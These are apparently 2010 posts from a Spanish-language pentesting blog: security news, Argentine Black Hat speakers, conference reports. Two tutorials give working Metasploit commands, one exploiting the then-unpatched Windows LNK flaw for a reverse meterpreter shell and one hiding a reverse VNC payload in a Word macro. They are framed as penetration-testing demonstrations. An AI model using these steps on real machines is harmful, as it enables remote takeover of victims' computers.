sábado, 31 de julio de 2010

Recopilación de Artículos de Metasploit

Revisando las estadísticas de este blog, siempre encuentro artículos de Metasploit como los más leídos, así que aquí les dejo una recopilación de algunos de estos.

También les recomiendo una excelente recopilación anual que hizo DragonJAR sobre "Lo mejor de Kungfoosion.com" :)

- Explotando "LNK" con MetaSploit
- MetaSploit con Microsoft Word
- Ataque USB U3 con MetaSploit
- Embebiendo un Ejecutable dentro de un PDF con MetaSploit
- Ingeniería Social con Applets firmados de Java en MetaSploit
- Jugando con NeXpose y MetaSploit
- Meterpreter x Tres!
- Obteniendo una Shell de Meterpreter
- Pivoting en MetaSploit con portfwd
- Explotando el 0-day de Adobe Reader
- Prefetch en Meterpreter
- Karmetasploit en BackTrack 4
- Pivoting con MetaSploit

Aprovecho para agradecer a todos los amigos que leen este blog, que por primera vez superan los 1000 lectores de RSS!! Gracias a todos por el apoyo continuo :)


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

lunes, 26 de julio de 2010

Curiosidades de Speakers Argentinos en Black Hat y ekoparty

Mirando los archivos de la Black Hat, es interesante observar como fue creciendo el research argentino, y quienes han sido los pioneros en este campo en nuestro país.

Quiero aclarar que hay muchos investigadores argentinos que han publicado sus trabajos en otras excelentes conferencias alrededor del mundo, pero probablemente Black Hat sea la CON más representativa de todas.


En este gráfico, se pueden observar la cantidad de "charlas" por año, en todas las Black Hat (USA, Europe, DC, etc.) basado en el archivo de la conferencia. Sepan disculpar cualquier error u omisión! :)

La primer Black Hat nació en 1997, y solamente 4 años mas tarde ya teníamos representantes de nuestro país, sin duda quienes han impulsado el research en nuestro país hasta el día de hoy.

Este es el listado histórico de charlas en la Black Hat:

2001
- Iván Arce & Max Caceres - (Black Hat USA) -
  Automated Penetration Testing

2002
- Maximiliano Caceres - (Black Hat USA)
  Syscall Proxying

2003
- Gerardo Richarte - (Black Hat USA)
  Modern Intrusion Practices
- Cesar Cerrudo & Aaron Newman - (Black Hat Windows Security)
  Hunting Flaws in MS SQL Server

2004
- Cesar Cerrudo - (Black Hat Windows Security)
  Auditing ActiveX Controls

2005
- Esteban Martínez Fayó - (Black Hat USA)
  Advanced SQL Injection in Oracle Databases
- Cesar Cerrudo - (Black Hat USA)
  Demystifying MS SQL Server & Oracle Database Server Security
- Cesar Cerrudo - (Black Hat Europe)
  Hacking Windows Internals

2006
- Cesar Cerrudo - (Black Hat Europe)
  WLSI - Windows Local Shellcode Injection
- Cesar Cerrudo - (Black Hat DC)
  Client Side Penetration Testing - Black Hat Federal 2006

2007
- Ezequiel D. Gutesman & Ariel Waissbein - (Black Hat USA)
  A Dynamic Technique for Enhancing the Security and Privacy of Web Applications
- Alfredo Ortega - (Black Hat USA)
  OpenBSD Remote Exploit
- Ariel Waissbein & Damian Saura - (Black Hat USA)
  Timing Attacks for Recovering Private Entries From Database Engines
- Cesar Cerrudo & Esteban Martinez Fayo - (Black Hat Europe)
  Hacking Databases for Owning Your Data
- Mariano Nuñez Di Croce - (Black Hat Europe)
  Attacking the Giants: Exploiting SAP Internals - Black Hat Europe 2007
- Cesar Cerrudo - (Black Hat DC)
  Practical 10 Minute Security Audit: The Oracle Case

2008
- Luciano Bello, Maximiliano Bertacchini - (Black Hat USA)
  Predictable RNG in the Vulnerable Debian OpenSSL package, the What and the How
- Ariel Futoransky - (Black Hat USA)
  Viral Infections in Cisco IOS

2009
- Cesar Cerrudo - (Black Hat DC)
  SQL Server Anti-Forensics
- Mariano Nunez Di Croce - (Black Hat Europe)
  SAP Penetration Testing
- Alfredo Ortega, Anibal Sacco - (Black Hat USA)
  Deactivate the Rootkit

2010
(lo que hay publicado hasta ahora)
- Cesar Cerrudo - (Black Hat USA)
  Token Kidnapping's Revenge
- Mariano Nuñez Di Croce - (Black Hat USA)
  SAP Backdoors: A ghost at the heart of your business
- Esteban Martínez Fayó - (Black Hat USA)
  Hacking and protecting Oracle Database Vault
- Leandro Meiners, Diego Sor - (Black Hat USA)
  WPA Migration Mode: WEP is back to haunt you...
- Hernan Ochoa, Agustin Azubel - (Black Hat USA)
  Understanding the Windows SMB NTLM Weak Nonce vulnerability
- Nicolas Waisman - (Black Hat USA)
  Aleatory Persistent Threat
- Jorge Luis Alvarez Medina - (Black Hat DC)
  Internet Explorer turns your personal computer into a public file server
- Mariano Nuñez Di Croce - (Black Hat Europe)
  SAP Backdoors: A ghost at the heart of your business


Por otro lado, también es interesante observar como se fueron internacionalizando las presentaciones de la ekoparty:




A medida que la conferencia fue creciendo, también fueron llegando speakers de otras partes del mundo. Pero mas allá de la cuestión presupuestaria, sin una cantidad de researchers locales tan importante, sería imposible organizar una conferencia como ekoparty.

Aprovecho para agradecer enormemente a todos los researchers locales que constantemente apoyan la ekoparty! :)


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

domingo, 25 de julio de 2010

Kung-FOO de la Semana #003

Otra semana paso, los grandes eventos en Las Vegas están cada vez mas cerca, y continúan las sorpresas en el mundillo de la seguridad.


Estas son solo algunas notas del Kung-FOO de la Semana!

- Una nueva versión de la FOCA se encuentra disponible, con presentación en la DEFCON y Black Hat Arsenal incluída, y hasta el manual del usuario!

- Mucho se hablo del bug de LNK esta semana, en Hispasec realizaron una excelente explicación de la vulnerabiliad, en Security By Default nos mostraron como solucionar el problema, y lo que todos los geeks estábamos esperando, la opinión de Chema Alonso sobre todo el asunto! ;-)

- Una nueva versión de evilgrade va a ser presentada en la DEFCON y en el Black Hat Arsenal, demostrando como este ataque sigue siendo efectivo!

- Desde Infobyte nos muestran porque usar ÜberTwitter en BlackBerry puede ser un poquito peligroso ;-)

Algunas de las novedades de la ekoparty para esta semana y mucho más por venir... 

- Se confirmo a Alejandro Eguía de Spamloco.net como el Blogger Oficial de la 6a. edición de la ekoparty.

- Se confirmo el training "Hacking y Seguridad en VoIP" dictado por Giovanni Cruz Forero.


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

viernes, 23 de julio de 2010

Ganate un training GRATIS de Wireless Hacking!

Para publicitar su nuevo training "Wireless Hacking", BASE4 Security realizará el sorteo de una vacante totalmente gratuita!

Para participar del sorteo, solamente tenés que registrarte en la siguiente dirección:


Como siempre, los trainings de BASE4 Security tienen como objetivo innovar en cada una de sus temáticas, y están fuertemente enfocados en la parte práctica, por ello les puedo asegurar que el training "Wireless Hacking" es algo diferente a cualquier otro training de seguridad en redes wireless que hayan visto.

Durante este training de 3 días de duración, no solo se presentarán todos los posibles ataques para comprometer una red wireless, o las técnicas más efectivas para atacar a sus usuarios, sino que también aprenderán como construir una poderosa antena y luego realizarán un wardriving con ella! Entre muchas otras cosas... ;-)



El instructor oficial de este training es Juan Pablo Borgna, uno de los organizadores de la ekoparty, responsable entre otras cosas del ya famoso Wardriving que se organiza en cada edición, y un gurú en el hacking de dispositivos electrónicos. Los amigos también lo conocen como "Gibatron" ;)

Pueden consultar las fechas de los próximos trainings en www.base4sec.com, y enterarse de todas las novedades y promociones a través de Twitter: @base4sec 


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

miércoles, 21 de julio de 2010

Explotando "LNK" con MetaSploit

MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.

Para testear esta vulnerabilidad primero debemos actualizar el framework con "svn update", y luego hacemos lo siguiente:

use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit

De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!

Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:

- Microsoft Security Advisory (2286198)
- Security By Default: Solución a la vulnerabilidad "LNK" de Windows mediante Directivas de Restricción de Software

Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

domingo, 18 de julio de 2010

Kung-FOO de la Semana #002

Como habrán advertido, la producción de este blog disminuye proporcionalmente nos acercamos al 16/17 de Septiembre :)


Esta semana estuve bastante off-line, así que solamente les dejo una recopilación de todas las novedades de la ekoparty:

1. Se confirmo el KONEX como locación de la ekoparty.

2. Se confirmo el training "Lockpicking, From Novice to Master in Two Days" dictado por Deviant Ollam.

3. Se confirmo el training "SAP Security In-Depth" dictado por Mariano Nuñez Di Croce.

4. Se confirmo el training "Open Source Intelligence Gathering for Pentesting" dictado por Chema Alonso.

5. Se confirmo el training "Python for Hackers" dictado por Sebastián Fernández y Matias Soler.

6. Se confirmo el training "Breaking Windows" dictado por Agustín Gianni y Franco Riccobaldi.

7. Se confirmo el training "Web Testing & Exploiting Workshop" dictado por Nahuel Grisolía y Andrés Riancho.

 
Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

miércoles, 14 de julio de 2010

MetaSploit con Microsoft Word

A la hora de demostrar falencias de seguridad por parte de los usuarios, una de las pruebas de concepto más simples y efectivas que podemos realizar es la de incluir un payload de MetaSploit dentro de un archivo Word.

En tres simples pasos, vamos a generar un payload de MetaSploit como una macro de visual basic, luego vamos a embeber esta macro en un archivo Word, y finalmente vamos a dejar escuchando por la conexión reversa que se va a realizar cuando la víctima abra el archivo.

 
1. Generamos el Paylaod

Seleccionamos como payload una conexión reversa de VNC, que se conectará a la IP "10.10.10.10" en el puerto "443":

./msfpayload windows/vncinject/reverse_tcp LHOST=10.10.10.10 LPORT=443 V > payload.bas

No es necesario que la víctima tenga instalado un servidor de VNC, pero si que el atacante tenga el vncviewer instalado. Si no lo tiene: "apt-get install vncviewer".


2. Embebemos la Macro

Debemos separar al archivo payload.bas en dos partes que están claramente divididos dentro del mismo, por un lado el código de la macro y por el otro los datos del payload.

Primero vamos a "Herramientas -> Macro -> Editor de Visual Basic". Luego vamos a "Archivo -> Importar Archivo" y allí seleccionamos el archivo que previamente dividimos con el código de la macro.



Si queremos verificar que el código de la macro se cargo correctamente, vamos al menú de la izquierda, y en la carpeta "Módulos" deberías poder encontrar "Módulo 1" con nuestro código. Al darle doble click a "Modulo 1" aparecerá el código cargado.

Cerramos el "Editor de Visual Basic", y al final del contenido de Word, copiamos los datos del payload.


3. Escuchamos la Conexión Reversa

Finalmente dejamos escuchando por la conexión reversa de VNC que se va a crear cuando la víctima abra el archivo de Word.

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=10.10.10.10 LPORT=443 E

Si no queremos que se abra la Shell de Cortesía de Metasploit, que es una consola de DOS de color azul, debemos agregar esto a lo anterior: "DisableCourtesyShell=True"

Para finalizar, en un ataque real nadie va a utilizar VNC como payload porque obviamente la víctima podrá ver que tenemos control de su PC, pero por otro lado esto es muy efectivo para hacer demostraciones prácticas a la gerencia de una compañía ;-)


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

domingo, 11 de julio de 2010

Kung-FOO de la Semana #001

A partir de hoy, todos los Domingos voy a publicar el "Kung-FOO de la Semana" con las novedades/links de lo más interesante de los últimos días.


1. ekoparty: Presentamos el "RETO FORENSE" que será organizado por DragonJAR.
 
3. ekoparty: El slogan oficial de esta edición es "Que la sigan ROOTEANDO".
 
4. Agradezco a Hack Players por incluir a kungfoosion.com en la encuesta de blogs en español. :)

Prometo más links para la próxima y felicitaciones para todos los amigos de España por su primer copa del mundo!

jueves, 8 de julio de 2010

Crónicas De Mi Primer Campus Party

Paso la Campus Party Colombia, sin dudas uno de los eventos de tecnología más importantes de Sudamérica, y después de tan increíble experiencia, solo queda esperar por la Campus Party Argentina que se va a realizar por primera vez este año en Buenos Aires! :)


Antes que nada debo felicitar a la organización de Campus Party Colombia por el excelente trabajo realizado, y especialmente a Alberto Gil, coordinador de Seguridad y Redes, por el éxito conseguido en la inauguración de esta área. Según comentará Alberto, fue una de las áreas que más personas reunió en torno a las charlas y actividades.

La Campus Party comenzó el Lunes, con toda la locura de la registración y una larguísima fila de enardecidos campuseros ansiosos por comenzar su estadía. Afortunadamente me encontré con mis amigos de DragonJAR que se encontraban a pocos metros de la entrada ;)

El Martes me invitaron a participar de un conversatorio que contaba con la presencia del Mayor Freddy Bautista de la Policía Nacional de Colombia y Armando Carvajal, Gerente de Consultoría de GlobaltekSecurity. El conversatorio fue excelentemente moderado por el amigo SamuraiBlanco.


El Mayor expuso sobre el avance de los delitos informáticos en colombia, el Sr. Carvajal sobre algunas de las vulnerabilidades más explotadas en la actualidad, y a mi me toco exponer sobre la inserción laboral de los jóvenes profesionales al mercado de la seguridad de la información. Durante toda la semana recibí una gran cantidad de consultas sobre este tema, por lo que espero que mi aporte haya servido.

El Miércoles realice la presentación para la que me invitaron "What Works On Client Side Pentesting" con una gran cantidad de asistentes interesados en esta temática.


Según parece se perdieron unos 10 minutos de la grabación de mi charla, por lo que la separaron en dos partes. Aquí pueden encontrar la Parte I, más la Parte II, y los slides de la misma.

Como algunos de mis amigos colombianos sabían que durante la semana de la Campus Party cumplía años, al finalizar la charla me llevaron al escenario una torta con 25 velitas encendidas ;) Gracias!!! realmente fue un gesto muy lindo que lo voy a recordar siempre.

La semana seguía muy movida, y durante el Jueves y el Viernes, también dicte un workshop sobre los ataques client side que vimos durante la charla del día anterior, también con una gran cantidad de asistentes interesados en el tema.

Durante toda la semana, el área de Seguridad y Redes contó con una gran cantidad de charlas por demás interesantes. También hubo muchas actividades, como competencias del tipo CTF, o el "Reto Forense" organizado por DragonJAR, que logró reunir más de 300 interesados en la inauguración, y una gran cantidad de equipos compitiendo hasta último momento.

El Sábado a la noche, ya se estaba terminando la Campus Party, y todo el mundo sabía que tenía que ir a un único lugar, la DragonParty! Una fiesta organizada por DragonJAR para toda la Campus Party. Estuvo muy divertida, y la verdad que verlo a SamuraiBlanco cantando apasionadamente en el escenario... no tiene precio! :P

Finalmente quiero agradecerle a la Campus Party Colombia por haberme invitado, fue una experiencia realmente increíble, y también enviarle un fuerte abrazo a todos mis amigos colombianos.

Y como dice la publicidad: "Colombia, el riesgo es que te quieras quedar". Viva Colombia! ;)

LinkWithin